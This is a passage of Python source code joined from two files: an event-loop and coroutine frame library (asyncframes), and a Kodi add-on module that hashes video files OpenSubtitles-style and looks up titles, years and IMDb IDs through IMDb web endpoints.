_THREAD_LOCALS._current_frame = None
# Clear event queue
while True:
try:
self.event_queue.get(False)
except queue.Empty:
break
# Clear main eventloop
self._clear()
self._idle = True
# Stop worker eventloops
for eventloop in self.eventloops[1:]: eventloop._invoke(0, eventloop._stop, ())
for worker in workers: self._jointhread(worker)
def _enqueue(self, delay, callback, args, eventloop_affinity=None):
if len(self.eventloops) == 1: # If running singlethreaded, ...
# Execute callback from current eventloop
if _THREAD_LOCALS._current_eventloop == self:
self._post(delay, callback, args)
else:
self._invoke(delay, callback, args)
elif eventloop_affinity: # If a target eventloop was provided, ...
# Execute callback from target eventloop
if _THREAD_LOCALS._current_eventloop == eventloop_affinity:
eventloop_affinity._post(delay, callback, args)
else:
eventloop_affinity._invoke(delay, callback, args)
else: # If no target eventloop was provided, ...
if delay > 0.0:
# Call _enqueue again with 0 delay after 'delay' seconds
#TODO: Consider running a dedicated event loop instead of eventloops[-1] for delays
if _THREAD_LOCALS._current_eventloop == self.eventloops[-1]:
self.eventloops[-1]._post(delay, self.eventloops[-1]._enqueue, (0.0, callback, args))
else:
self.eventloops[-1]._invoke(delay, self.eventloops[-1]._enqueue, (0.0, callback, args))
else: # If delay == 0, ...
# Place the callback on the event queue
self.event_queue.put((callback, args))
# Wake up an idle event (if any)
for eventloop in self.eventloops:
if eventloop._idle:
eventloop._idle = False
eventloop._invoke(0, eventloop._dequeue, ())
break
def _dequeue(self):
try:
callback, args = self.event_queue.get_nowait()
except queue.Empty:
self._idle = True
else:
callback(*args)
if not self.event_queue.empty():
self._post(0, self._dequeue, ())
else:
self._idle = True
@staticmethod
def sendevent(eventsource, event, process_counter=None, blocking=False):
# Save current frame, since it will be modified inside Awaitable.process()
currentframe = _THREAD_LOCALS._current_frame
try:
eventsource.process(eventsource, event, process_counter, blocking)
finally:
# Restore current frame
_THREAD_LOCALS._current_frame = currentframe
def postevent(self, eventsource, event, delay=0):
self._enqueue(delay, AbstractEventLoop.sendevent, (eventsource, event, None, False), eventsource._eventloop_affinity)
def process(self, sender, msg, process_counter=None, blocking=False):
self._result = msg
self._stop() # Stop event loop
class Awaitable(collections.abc.Awaitable):
"""An awaitable frame or event.
Every node in the frame hierarchy is a subclass of `Awaitable`. An awaitable has a `__name__`,
a parent awaitable (None, if the awaitable is the main frame), a list of child awaitables and
a result, that gets set when the awaitable finishes.
Args:
name (str): The name of the awaitable.
"""
def __init__(self, name, singleshot, lifebound):
self.__name__ = name
self.singleshot = singleshot
self.lifebound = lifebound
self.fired = False
self._parent = _THREAD_LOCALS._current_frame
if self._parent is not None:
self._parent._children.append(self)
self._removed = False
self._result = None
self._listeners = set()
self._current_inline_frame = self
self._is_inline_frame = False
self._eventloop_affinity = None
self.exception_handler = None
def _ondispose(self):
"""Virtual function for cleaning up a derived class.
This function is called after awaiting frames have been woken, but before the class is deleted."""
pass
def _remove(self, process_counter=None, blocking=False, ondone=lambda result: None):
# Mark self as removed
if self._removed:
ondone(False)
if process_counter:
process_counter.sub(1)
return
self._removed = True
# Remove self from parent frame
if self._parent is not None:
self._parent._children.remove(self)
if self.lifebound:
# Wake up listeners
self.fired = True
if self._listeners:
listeners = self._listeners
self._listeners = set()
if blocking:
if process_counter:
process_counter.add(len(listeners))
for listener in listeners:
if listener._eventloop_affinity is None or listener._eventloop_affinity == _THREAD_LOCALS._current_eventloop:
listener.process(self, self._result, process_counter, blocking)
else:
listener._eventloop_affinity._invoke(0, listener.process, (self, self._result, process_counter, blocking))
else:
for listener in listeners:
_THREAD_LOCALS._current_eventloop._enqueue(0, listener.process, (self, self._result), listener._eventloop_affinity)
self._ondispose()
del self
ondone(True)
if process_counter:
process_counter.sub(1)
return
def remove(self):
"""Remove this awaitable from the frame hierarchy.
Returns:
Event: An awaitable event.
The remove event returns True once the awaitable has been removed or False if
the request was either canceled, or the awaitable had already been removed before.
"""
remove_event = Event(str(self.__name__) + ".remove", singleshot=True, lifebound=False)
process_counter = _AtomicCounter(1, lambda result: AbstractEventLoop.sendevent(remove_event, result, None, True)) # Add process: Frame.remove
process_counter.on_zero_args = (True,) # Default remove() result to True
def onremoved(result):
process_counter.on_zero_args = (result,)
self._remove(process_counter, False, onremoved)
return remove_event
@property
def removed(self):
"""Boolean property, indicating whether this awaitable has been removed from the frame hierarchy."""
return self._removed
def __str__(self):
"""Human readable representation of this frame."""
return self.__name__
def __repr__(self):
return "<{}.{} object at 0x{:x}>".format(self.__module__, self.__name__, id(self))
def __lt__(self, other):
"""Make awaitables sortable by name."""
return self.__name__ < other.__name__
def __bool__(self):
return (self.lifebound and self._removed) or (self.singleshot and self.fired)
def __await__(self):
if self: # If this awaitable already finished
return self._result
try:
return (yield self)
except (StopIteration, GeneratorExit):
return self._result
@abc.abstractmethod
def _step(self, sender, msg):
raise NotImplementedError # pragma: no cover
def process(self, sender, msg, process_counter=None, blocking=False):
"""Handle an incomming event from the eventloop.
.. deprecated:: 2.1
This method will be made private in a future release of asyncframes.
Args:
sender (Awaitable): The source of the event.
msg: The incomming event.
process_counter (_AtomicCounter, optional): Defaults to None. A thread-safe counter that determins when an event has been fully processed.
blocking (bool, optional): Defaults to False. If True, doesn't return until the event was fully processed.
"""
_THREAD_LOCALS._current_frame = self._current_inline_frame # Activate self
try:
self._step(sender, msg)
except BaseException as err:
if getattr(self, 'ready', True): # If self is ready or self doesn't have a ready event
# Send ready event to all listeners that have a ready event, but aren't ready yet
for listener in self._listeners:
if not getattr(listener, 'ready', True):
AbstractEventLoop.sendevent(listener.ready, None, None, True)
# Store result
if type(err) == StopIteration:
self._result = err.value
elif type(err) != GeneratorExit:
self._result = err
# Call exception handler
if err != msg:
awaitable = self
while awaitable is not None:
if awaitable.exception_handler:
try:
awaitable.exception_handler(self, err)
except Exception as exception_handler_err:
err = exception_handler_err
else:
break
awaitable = awaitable._parent
if awaitable is None:
maineventloop = _THREAD_LOCALS._current_eventloop.eventloops[0]
maineventloop._exception = err
if maineventloop._eventloop_affinity is None or maineventloop._eventloop_affinity == _THREAD_LOCALS._current_eventloop:
maineventloop._stop()
else:
maineventloop._eventloop_affinity._invoke(0, maineventloop._stop, ())
if self.singleshot:
if process_counter:
process_counter.add(1)
self._remove(process_counter, blocking) # Remove awaitable and propagate event
# Wake up listeners
self.fired = True
if self._listeners:
listeners = self._listeners
self._listeners = set()
if blocking:
if process_counter:
process_counter.add(len(listeners))
for listener in listeners:
if listener._eventloop_affinity is None or listener._eventloop_affinity == _THREAD_LOCALS._current_eventloop:
listener.process(self, self._result, process_counter, blocking)
else:
listener._eventloop_affinity._invoke(0, listener.process, (self, self._result, process_counter, blocking))
else:
for listener in listeners:
_THREAD_LOCALS._current_eventloop._enqueue(0, listener.process, (self, self._result), listener._eventloop_affinity)
# if self.singleshot:
# return # Don't decrease process_counter, since it was already decreased by self._remove()
else:
if getattr(self, 'ready', True): # If self is ready or self doesn't have a ready event
# Send ready event to all listeners that have a ready event, but aren't ready yet
for listener in self._listeners:
if not getattr(listener, 'ready', True):
AbstractEventLoop.sendevent(listener.ready, None, None, True)
if process_counter:
process_counter.sub(1)
def __and__(self, other):
"""Register A & B as shortcut for ``all_(A, B)``.
Args:
other (Awaitable): The other awaitable.
Returns:
all\_: A frame awaiting `self` and `other`.
"""
return all_(self, other)
def __or__(self, other):
"""Register A | B as shortcut for ``any_(A, B)``.
Args:
other (Awaitable): The other awaitable.
Returns:
any\_: A frame awaiting `self` or `other`.
"""
return any_(self, other)
class Event(Awaitable):
"""An awaitable event.
Instantiate or overload this class to implement new events.
Each type of event should be emitted by exactly one event class.
For example, key-up and key-down events should be implemented by two separate events.
Events represent leave nodes in the frame hierarchy.
Args:
name (str): The name of the event.
singleshot (bool, optional): Defaults to False. If True, removes the event after it has been woken.
"""
def __init__(self, name, singleshot=False, lifebound=False):
super().__init__(name, singleshot, lifebound)
self.eventloop = _THREAD_LOCALS._current_eventloop # Store creating eventloop, as a fallback in case self.post() is called from a thread without an eventloop
def _step(self, sender, msg):
"""Handle incoming events.
Args:
sender (Event): The event to be handled. This value is always identical to `self`.
msg: The event arguments.
Raises:
StopIteration: If this event should wake up awaiting frames, raise a StopIteration with `value` set to the event arguments.
"""
stop = StopIteration()
stop.value = msg
raise stop
def send(self, args=None):
"""Dispatch and immediately process an event.
Args:
args (optional): Defaults to None. Event arguments, for example, the progress value on a progress-update event.
"""
send_event = Event(str(self.__name__) + ".send", singleshot=True)
process_counter = _AtomicCounter(1, lambda: AbstractEventLoop.sendevent(send_event, None, None, True))
AbstractEventLoop.sendevent(self, args, process_counter, True)
return send_event
def post(self, args=None, delay=0):
"""Enqueue an event in the event loop.
Args:
args (optional): Defaults to None. Event arguments, for example, the progress value on a progress-update event.
delay (float, optional): Defaults to 0. The time in seconds to wait before posting the event.
"""
(_THREAD_LOCALS._current_eventloop or self.eventloop).postevent(self, args, delay)
class all_(Awaitable):
"""An awaitable that blocks the awaiting frame until all passed awaitables have woken up.
Args:
awaitables (Awaitable[]): A list of all awaitables to await.
"""
def __init__(self, *awaitables):
super().__init__("all({})".format(", ".join(str(a) for a in awaitables)), singleshot=True, lifebound=True)
self._remove_lock = threading.Lock()
self._awaitables = collections.defaultdict(list)
self._result = [None] * len(awaitables)
for i, awaitable in enumerate(awaitables):
if awaitable:
self._result[i] = awaitable._result
else:
self._awaitables[awaitable].append(i)
awaitable._listeners.add(self)
if not self._awaitables:
self._remove()
return
def _step(self, sender, msg):
"""Respond to an awaking child.
Args:
sender (Awaitable): The awaking child.
msg: The awaking child's result or an exception raised in a child frame.
Raises:
StopIteration: Once all children woke up, this raises a StopIteration with `value` set to a dict of all children's results.
BaseException: If msg is an Exception other than GeneratorExit or StopIteration, the exception is re-raised.
"""
for i in self._awaitables.pop(sender, ()):
self._result[i] = msg
if not self._awaitables:
stop = StopIteration()
stop.value = self._result
raise stop
def _remove(self, process_counter=None, blocking=False, ondone=lambda result: None):
if self.removed:
ondone(False)
if process_counter:
process_counter.sub(1)
return
with self._remove_lock:
if self.removed: # If this frame was closed while acquiring the lock, ...
ondone(False)
if process_counter:
process_counter.sub(1)
return
for awaitable in self._awaitables:
awaitable._listeners.discard(self)
self._awaitables.clear()
# Remove awaitable
super()._remove(process_counter, blocking, ondone)
return
if process_counter:
process_counter.sub(1)
ondone(False)
class any_(Awaitable):
"""An awaitable that blocks the awaiting frame until any of the passed awaitables wakes up.
Args:
awaitables (Awaitable[]): A list of all awaitables to await.
"""
def __init__(self, *awaitables):
super().__init__("any({})".format(", ".join(str(a) for a in awaitables)), singleshot=True, lifebound=True)
self._remove_lock = threading.Lock()
self._awaitables = set()
for awaitable in awaitables:
if awaitable:
self._result = (awaitable, awaitable._result)
self._remove()
return
else:
self._awaitables.add(awaitable)
awaitable._listeners.add(self)
def _step(self, sender, msg):
"""Respond to an awaking child.
Args:
sender (Awaitable): The awaking child.
msg: The awaking child's result or an exception raised in a child frame.
Raises:
StopIteration: If msg indicates an awaking child, store its result as this frame's result.
BaseException: Forward any exceptions.
"""
stop = StopIteration()
stop.value = (sender, msg)
raise stop
def _remove(self, process_counter=None, blocking=False, ondone=lambda result: None):
if self.removed:
ondone(False)
if process_counter:
process_counter.sub(1)
return
with self._remove_lock:
if self.removed: # If this frame was closed while acquiring the lock, ...
ondone(False)
if process_counter:
process_counter.sub(1)
return
for awaitable in self._awaitables:
awaitable._listeners.discard(self)
self._awaitables.clear()
# Remove awaitable
super()._remove(process_counter, blocking, ondone)
return
if process_counter:
process_counter.sub(1)
ondone(False)
class sleep(Event):
"""An awaitable event used for suspending execution by the specified amount of time.
A duration of 0 seconds will resume the awaiting frame as soon as possible.
This is useful to implement non-blocking loops.
Args:
seconds (float, optional): Defaults to 0. The duration to wait.
"""
def __init__(self, seconds=0.0):
super().__init__("sleep({})".format(seconds), singleshot=True, lifebound=False)
# Raise event
self.post(None, max(0, seconds))
class hold(Event):
"""An awaitable event used for suspending execution indefinitely.
Frames are automatically removed when the frame coroutine finishes.
If you would like the frame to remain open until it is removed, write `await hold()` at the end of the coroutine.
"""
def __init__(self):
super().__init__("hold()", singleshot=True, lifebound=False)
def _step(self, sender, msg):
""" Ignore any incoming events."""
pass
class animate(Event):
"""An awaitable event used for periodically calling a callback function for the specified amount of time.
Args:
seconds (float): The duration of the animation.
callback (Callable[float, None]): The function to be called on every iteration. The first parameter of `callback` indicates animation progress between 0 and 1.
interval (float, optional): Defaults to 0.0. The minimum time in seconds between two consecutive calls of the callback.
"""
def __init__(self, seconds, callback, interval=0.0):
super().__init__("animate()", singleshot=True, lifebound=False)
self.seconds = seconds
self.callback = callback
self.interval = interval
self.startTime = datetime.datetime.now()
self._final_event = False
# Raise event
if seconds <= interval:
self._final_event = True
self.post(None, max(0, seconds))
else:
self.post(None, interval)
def _step(self, sender, msg):
"""Resend the animation event until the timeout is reached."""
t = (datetime.datetime.now() - self.startTime).total_seconds()
if t >= self.seconds or self._final_event:
self.callback(1.0)
stop = StopIteration()
stop.value = msg
raise stop
else:
self.callback(t / self.seconds)
t = (datetime.datetime.now() - self.startTime).total_seconds() # Recompute t after callback
# Reraise event
if self.seconds - t <= self.interval:
self._final_event = True
self.post(None, max(0, self.seconds - t))
else:
self.post(None, self.interval)
class FrameMeta(abc.ABCMeta):
def __new__(mcs, name, bases, dct):
frameclass = super().__new__(mcs, name, bases, dct)
if bases != (Awaitable,): # If frameclass != Frame, ...
frameclass.Factory = type(frameclass.__name__ + '.Factory', (frameclass.Factory,), {}) # Derive factory from base class factory
frameclass.Factory.frameclass = frameclass
return frameclass
def __enter__(self):
return self().__enter__()
def __exit__(self, exc_type, exc_val, exc_tb):
return self().__exit__(exc_type, exc_val, exc_tb)
class Frame(Awaitable, metaclass=FrameMeta):
"""An object within the frame hierarchy.
This class represents the default frame class. All other frame classes have
to be derived from :class:`Frame`.
A frame is an instance of a frame class. Use the nested Factory class to
create frames.
The factory class is created by decorating a function or coroutine with
``@FRAME``, where ``FRAME`` is the frame class.
Example: ::
class MyFrameClass(Frame):
pass
@MyFrameClass
async def my_frame_factory():
pass
assert(type(my_frame_factory) == MyFrameClass.Factory)
my_frame = my_frame_factory()
assert(type(my_frame) == MyFrameClass)
Args:
startup_behaviour (FrameStartupBehaviour, optional): Defaults to FrameStartupBehaviour.delayed.
Controls whether the frame is started immediately or queued on the eventloop.
thread_idx (int, optional): Defaults to None. If set, forces the scheduler to affiliate this frame with the given thread.
Attributes:
free (Event): An event that fires just before the frame is removed.
ready (Event): An event that fires the first time the frame is suspended (using ``await``) or goes out of scope.
Raises:
ValueError: If `thread_idx` is outside the range of allocated threads.
The number of allocated threads is controlled by the `num_threads` parameter of :meth:`AbstractEventLoop.run`.
"""
class Factory(object):
"""A frame function declared in the context of a frame class.
Args:
framefunc (Callable): The function or coroutine that describes the frame's behaviour.
frameclassargs (tuple): Positional arguments to the frame class.
frameclasskwargs (dict): Keyword arguments to the frame class.
"""
def __init__(self, framefunc, frameclassargs, frameclasskwargs):
self.framefunc = framefunc
self.frameclassargs = frameclassargs
self.frameclasskwargs = frameclasskwargs
def __call__(self, *frameargs, **framekwargs):
"""Produce an instance of the frame.
Raises:
InvalidOperationException: Raised when no event loop is currently running.
Returns:
Frame: The newly created frame instance.
"""
if self.framefunc is None:
self.framefunc = frameargs[0]
return self
if _THREAD_LOCALS._current_eventloop is None:
raise InvalidOperationException("Can't call frame without a running event loop")
frame = super(Frame, self.__class__.frameclass).__new__(self.__class__.frameclass)
frame.__init__(*self.frameclassargs, **self.frameclasskwargs)
frame.create(self.framefunc, *frameargs, **framekwargs)
return frame
def __enter__(self):
if self.framefunc is None:
# Instantiate frame class with empty framefunc
self.framefunc = lambda: None
self.framefunc.__name__ = self.frameclass.__name__
with_frame = self()
self.framefunc = None
else:
# Instantiate frame class with self.framefunc
with_frame = self()
with_frame._is_inline_frame = True
# Activate frame instance
non_with_frame_parent = _THREAD_LOCALS._current_frame
while non_with_frame_parent._is_inline_frame:
non_with_frame_parent = non_with_frame_parent._parent
non_with_frame_parent._current_inline_frame = with_frame._current_inline_frame
_THREAD_LOCALS._current_frame = with_frame._current_inline_frame
return with_frame
def __exit__(self, exc_type, exc_val, exc_tb):
# Activate parent
non_with_frame_parent = _THREAD_LOCALS._current_frame
while non_with_frame_parent._is_inline_frame:
non_with_frame_parent = non_with_frame_parent._parent
non_with_frame_parent._current_inline_frame = _THREAD_LOCALS._current_frame._parent
_THREAD_LOCALS._current_frame = _THREAD_LOCALS._current_frame._parent
def __new__(cls, *frameclassargs, **frameclasskwargs):
if len(frameclassargs) == 1 and not frameclasskwargs and callable(frameclassargs[0]): # If @frame was called without parameters
return cls.Factory(frameclassargs[0], (), {})
else: # If @frame was called with parameters
return cls.Factory(None, frameclassargs, frameclasskwargs)
def __init__(self, startup_behaviour=FrameStartupBehaviour.delayed, thread_idx=None):
if thread_idx is not None and (thread_idx < 0 or thread_idx >= len(_THREAD_LOCALS._current_eventloop.eventloops)):
raise ValueError("thread_idx must be an index between 0 and " + str(len(_THREAD_LOCALS._current_eventloop.eventloops)))
super().__init__(self.__class__.__name__, singleshot=True, lifebound=True)
_THREAD_LOCALS._current_frame = self._current_inline_frame
self.startup_behaviour = startup_behaviour
self._children = []
self._activechild = None
self._primitives = []
self._generator = None
self._generator_eventloop = None
self._freeing = False
self.ready = Event(str(self.__name__) + ".ready", True)
self.ready.ready = self.ready # Set ready state of ready event to itself. This way the ready event will propagate through `await frame.ready`
self.free = Event(str(self.__name__) + ".free", False)
self._eventloop_affinity = _THREAD_LOCALS._current_eventloop
if thread_idx is not None:
self._eventloop_affinity = self._eventloop_affinity.eventloops[thread_idx]
self._remove_lock = threading.Lock()
_THREAD_LOCALS._current_frame = self._current_inline_frame._parent
def create(self, framefunc, *frameargs, **framekwargs):
"""Start the frame function with the given arguments.
Args:
framefunc (function): A coroutine or regular function controlling the behaviour of this frame.
If `framefunc` is a coroutine, then the frame only exists until the coroutine exits.
"""
if framefunc and not self.removed and self._generator is None:
self.__name__ = framefunc.__name__
self.ready.__name__ = str(self.__name__) + ".ready"
self.free.__name__ = str(self.__name__) + ".free"
# Activate self
_THREAD_LOCALS._current_frame = self._current_inline_frame
hasself = 'self' in inspect.signature(framefunc).parameters
self._generator = framefunc(self, *frameargs, **framekwargs) if hasself else framefunc(*frameargs, **framekwargs)
if inspect.isawaitable(self._generator): # If framefunc is a coroutine
if self.startup_behaviour == FrameStartupBehaviour.delayed:
# Post coroutine to the event queue
_THREAD_LOCALS._current_eventloop.postevent(self, None, 0.0)
elif self.startup_behaviour == FrameStartupBehaviour.immediate:
# Start coroutine
try:
self._step(None, None)
except (StopIteration, GeneratorExit):
pass
finally:
# Activate parent
_THREAD_LOCALS._current_frame = self._current_inline_frame._parent
else:
raise ValueError('startup_behaviour must be FrameStartupBehaviour.delayed or FrameStartupBehaviour.immediate')
else: # If framefunc is a regular function
AbstractEventLoop.sendevent(self.ready, None, None, True) # Send ready event
# Activate parent
_THREAD_LOCALS._current_frame = self._current_inline_frame._parent
def _step(self, sender, msg):
"""Resume the frame coroutine.
Args:
sender (Awaitable): The resumed awaitable.
msg: A message to be forwarded to the coroutine or None to start the coroutine.
Raises:
StopIteration: Raised if the coroutine finished with a result.
GeneratorExit: Raised if the coroutine finished without a result.
Exception: Raised if the coroutine encountered an error.
"""
if self.removed:
stop = StopIteration()
stop.value = self._result
raise stop
if self._generator is not None:
self._generator_eventloop = _THREAD_LOCALS._current_eventloop
try:
awaitable = self._generator.send(msg) # Continue coroutine
except (StopIteration, GeneratorExit): # If frame finished
self._generator_eventloop = None
if msg is None: AbstractEventLoop.sendevent(self.ready, None, None, True) # Send ready event if frame finished without ever being awaited
raise # Propagate event
except Exception as err: # If frame raised exception
self._generator_eventloop = None
raise # Propagate event
else: # If frame awaits awaitable
self._generator_eventloop = None
awaitable._listeners.add(self) # Listen to events of awaitable
# Send ready event if not yet ready and awaitable is ready or doesn't have a ready event
if getattr(awaitable, 'ready', True) and not self.ready: # If awaitable is ready or awaitable doesn't have a ready event
AbstractEventLoop.sendevent(self.ready, None, None, True)
def _mark_freeing(self, value):
self._freeing = value
for child in self._children:
if isinstance(child, Frame):
child._mark_freeing(value)
def _send_free_event(self, free_args, process_counter):
process_counter.add(len(self._children))
# Send child frame free events
for child in self._children[:]:
if not child.removed and isinstance(child, Frame):
child._send_free_event(free_args, process_counter)
else:
process_counter.sub(1)
# Send current frame free event
AbstractEventLoop.sendevent(self.free, free_args, process_counter, True)
def _remove(self, process_counter=None, blocking=False, ondone=lambda result: None):
if self._freeing: # If this frame's free event is being processed, ...
self._remove_stage2(process_counter, blocking, ondone) # Remove the frame
else: # If this frame's free event wasn't send yet, ...
self._mark_freeing(True) # Mark this frame and all children for removal
free_args = FreeEventArgs()
def after_free():
if free_args.cancel: # If the free event was canceled, ...
self._mark_freeing(False) # Unmark this frame and all children from removal
ondone(False) # Awake awaiting frames with value 'False'
if process_counter:
process_counter.sub(1)
elif self._removed: # If this frame was removed as a result of the free event, ...
ondone(True) # Awake awaiting frames with value 'True'
if process_counter:
process_counter.sub(1)
else: # If the free event wasn't canceled and didn't remove this frame, ...
self._remove_stage2(process_counter, blocking, ondone) # Remove this frame
self._send_free_event(free_args, _AtomicCounter(1, after_free))
def _remove_stage2(self, process_counter=None, blocking=False, ondone=lambda result: None):
if self.removed or not self._remove_lock.acquire(blocking=False): # If this frame was closed in response to the free event or removal is already in progress, ...
ondone(False)
if process_counter:
process_counter.sub(1) # Remove process: Frame._remove_stage2
else:
try:
# Remove child frames
genexit = None
if process_counter:
process_counter.add(len(self._children))
while self._children:
try:
self._children[-1]._remove(process_counter, blocking)
except GeneratorExit as err:
genexit = err # Delay raising GeneratorExit
# Remove primitives
while self._primitives:
self._primitives[-1].remove()
# Stop framefunc
if self._generator: # If framefunc is a coroutine
genevtlp = self._generator_eventloop # Avoid race condition between if and invoke
if genevtlp == _THREAD_LOCALS._current_eventloop: # If the coroutine is running on the current eventloop
# Calling coroutine.close() from within the coroutine is illegal, so we throw a GeneratorExit manually instead
try:
self._generator.close()
except ValueError:
genexit = GeneratorExit()
self._generator = None
elif genevtlp is not None: # If the coroutine is running on another eventloop
if process_counter:
process_counter.add(1) # Add process: Frame._remove_stage3
genevtlp._invoke(0, self._remove_stage3, (process_counter,))
else: # If the coroutine isn't running
self._generator.close()
self._generator = None
# Remove awaitable
super()._remove(process_counter, blocking, ondone)
finally:
self._remove_lock.release()
# Raise delayed GeneratorExit exception
if genexit:
raise genexit
def _remove_stage3(self, process_counter=None):
genevtlp = self._generator_eventloop # Avoid race condition between if and invoke
if genevtlp is None or genevtlp == _THREAD_LOCALS._current_eventloop: # If the coroutine isn't running or it's running on the current eventloop
self._generator.close()
if process_counter:
process_counter.sub(1) # Remove process: Frame._remove_stage3
else: # If the coroutine is running on another eventloop
genevtlp._invoke(0, self._remove_stage3, (process_counter,))
class PFrame(Frame):
"""A parallel :class:`Frame` that can run on any thread.
Multithreading can be enabled for any frame by changing its base class to
:class:`PFrame`.
The only difference between :class:`Frame` and :class:`PFrame` is that
instances of :class:`PFrame` are not restricted to run on the same thread as
their parent frame.
Args:
startup_behaviour (FrameStartupBehaviour, optional): Defaults to FrameStartupBehaviour.delayed.
Controls whether the frame is started immediately or queued on the eventloop.
thread_idx (int, optional): Defaults to None. If set, forces the scheduler to affiliate this frame with the given thread.
Raises:
ValueError: If `thread_idx` is outside the range of allocated threads.
The number of allocated threads is controlled by the `num_threads` parameter of :meth:`AbstractEventLoop.run`.
"""
def __init__(self, startup_behaviour=FrameStartupBehaviour.delayed, thread_idx=None):
super().__init__(startup_behaviour, thread_idx)
if thread_idx is None:
self._eventloop_affinity = None
class Primitive(object):
"""An object owned by a frame of the specified frame class.
A primitive has to be created within the frame function of its owner or within the frame function of any child frame of its owning frame class.
If it is created within a child frame, it will still be registered with the closest parent of the owning frame class.
Args:
owner (class): The owning frame class.
Raises:
TypeError: Raised if owner is not a frame class.
Exception: Raised if a primitive is created outside the frame function of its owning frame class.
"""
def __init__(self, owner):
self._removed = False
# Validate parameters
if not issubclass(owner, Frame):
raise TypeError("'owner' must be of type Frame")
# Find parent frame of class 'owner'
self._owner = find_parent(owner)
if self._owner is None:
raise InvalidOperationException(self.__class__.__name__ + " can't be defined outside " + owner.__name__)
# Register with parent frame
self._owner._primitives.append(self)
def _ondispose(self):
"""Virtual function for cleaning up a derived class.
This function is called before the class is deleted."""
pass
def remove(self):
"""Remove this primitive from its owner.
Returns:
bool: If True, this event was removed. If False the request was either canceled, or the event had already been removed before
"""
if self._removed:
return False
self._removed = True
self._owner._primitives.remove(self)
self._ondispose()
del self
return True
def get_current_eventloop_index():
"""Get the thread index of the currently active event loop.
Returns:
int: The thread index of the current event loop or None if no event loop is currently active.
"""
return _THREAD_LOCALS._current_eventloop.eventloops.index(_THREAD_LOCALS._current_eventloop) if getattr(_THREAD_LOCALS, '_current_eventloop', None) and hasattr(_THREAD_LOCALS._current_eventloop, 'eventloops') else None
def find_parent(parenttype):
"""Find parent frame of given type.
Recursively search the frame hierarchy for the closest ancestor of the given type.
Args:
parenttype (type): The frame class type to search for.
Returns:
Frame: The closest ancestor of type ``parenttype`` or None if none was found.
"""
parent = _THREAD_LOCALS._current_frame
while parent is not None and not isinstance(parent, parenttype):
parent = parent._parent
return parent
|
video.py | # -*- coding: utf-8 -*-
import os
import json
import struct
import hashlib
import re
import threading
from .kodi import xbmc, xbmcvfs, get_bool_setting
from . import logger, cache, utils, request
__64k = 65536
__longlong_format_char = 'q'
__byte_size = struct.calcsize(__longlong_format_char)
def __sum_64k_bytes(file, result):
range_value = __64k / __byte_size
if utils.py3:
range_value = round(range_value)
for _ in range(range_value):
try: chunk = file.readBytes(__byte_size)
except: chunk = file.read(__byte_size)
(value,) = struct.unpack(__longlong_format_char, chunk)
result.filehash += value
result.filehash &= 0xFFFFFFFFFFFFFFFF
def __set_size_and_hash(core, meta, filepath):
if core.progress_dialog and not core.progress_dialog.dialog:
core.progress_dialog.open()
f = xbmcvfs.File(filepath)
try:
filesize = meta.filesize = f.size()
# used for mocking
try:
meta.filehash = f.hash()
return
except: pass
if filesize < __64k * 2:
return
# ref: https://trac.opensubtitles.org/projects/opensubtitles/wiki/HashSourceCodes
# filehash = filesize + 64bit sum of the first and last 64k of the file
result = lambda: None
result.filehash = filesize
__sum_64k_bytes(f, result)
f.seek(filesize - __64k, os.SEEK_SET)
__sum_64k_bytes(f, result)
meta.filehash = "%016x" % result.filehash
finally:
f.close()
def __get_filename(title):
filename = title
video_exts = ['mkv', 'mp4', 'avi', 'mov', 'mpeg', 'flv', 'wmv']
try:
filepath = xbmc.Player().getPlayingFile()
filename = filepath.split('/')[-1]
filename = utils.unquote(filename)
for ext in video_exts:
if ext in filename:
filename = filename[:filename.index(ext) + len(ext)]
break
except: pass
return filename
def __scrape_tvshow_year(core, meta):
imdb_response = request.execute(core, {
'method': 'GET',
'url': 'https://www.imdb.com/title/' + meta.imdb_id,
'timeout': 10,
})
if imdb_response.status_code != 200:
return
show_year_match = re.search(r' %s \((.*?)\)"' % meta.tvshow, imdb_response.text)
if not show_year_match:
show_year_match = re.search(r'<title>.*?\(TV (?:Mini-)?Series (\d\d\d\d).*?</title>', imdb_response.text)
if not show_year_match:
show_year_match = re.search(r'<span class="parentDate">\((\d\d\d\d).*?\)</span>', imdb_response.text)
if show_year_match:
meta.tvshow_year = show_year_match.group(1).strip()
tvshow_years_cache = cache.get_tvshow_years_cache()
tvshow_years_cache[meta.imdb_id] = meta.tvshow_year
cache.save_tvshow_years_cache(tvshow_years_cache)
def __scrape_imdb_id(core, meta):
if meta.title == '' or meta.year == '':
return
is_movie = meta.season == '' and meta.episode == ''
title = (meta.title if is_movie else meta.tvshow).lower()
year = '_%s' % meta.year if is_movie else ''
query = '%s%s' % (title.lower().replace(' ', '_'), year)
query = query[:20]
request = {
'method': 'GET',
'url': 'https://v2.sg.media-imdb.com/suggestion/%s/%s.json' % (query[:1], query),
'timeout': 10
}
response = core.request.execute(core, request)
if response.status_code != 200:
return
results = core.json.loads(response.text)
if len(results['d']) == 0:
return
def filter_movie_results(result):
year_start = result.get('y', None)
result_type = result.get('q', None)
return (
result_type is not None and result_type in ['feature', 'TV movie'] and
result['l'].lower() == title and
(year_start is not None and year_start == year)
)
if is_movie:
year = int(meta.year)
results = list(filter(filter_movie_results, results['d']))
if len(results) > 0:
meta.imdb_id = results[0]['id']
return
show_title = title.lower()
episode_title = meta.title.lower()
episode_year = int(meta.year)
def filter_tvshow_results(result):
year_start = result.get('y', None)
year_end = result.get('yr', '-').split('-')[1]
result_type = result.get('q', None)
return (
result_type is not None and result_type in ['TV series', 'TV mini-series'] and
result['l'].lower() == show_title and
(year_start is not None and year_start <= episode_year) and
(year_end == '' or int(year_end) >= episode_year)
)
results = list(filter(filter_tvshow_results, results['d']))
if len(results) == 0:
return
if len(results) == 1:
meta.tvshow_year = str(results[0]['y'])
meta.imdb_id = results[0]['id']
return
episode_title_pattern = r'title=\"' + re.escape(episode_title) + r'\"'
for result in results:
episodes_response = core.request.execute(core, {
'method': 'GET',
'url': 'https://www.imdb.com/title/%s/episodes/_ajax?season=%s' % (result['id'], meta.season),
'timeout': 10
})
if episodes_response.status_code != 200:
continue
if re.search(episode_title_pattern, episodes_response.text, re.IGNORECASE):
meta.tvshow_year = str(result['y'])
meta.imdb_id = result['id']
return
def __update_info_from_imdb(core, meta, pagination_token=''):
request = {
'method': 'POST',
'url': 'https://graphql.imdb.com',
'data': core.json.dumps({
'query': '''
query TitlesList($idArray: [ID!]!, $paginationToken: ID) {
titles(ids: $idArray) {
id
titleText {
text
}
releaseDate {
year
}
series {
series {
id,
titleText {
text
}
releaseDate {
year
}
}
episodeNumber {
episodeNumber
seasonNumber
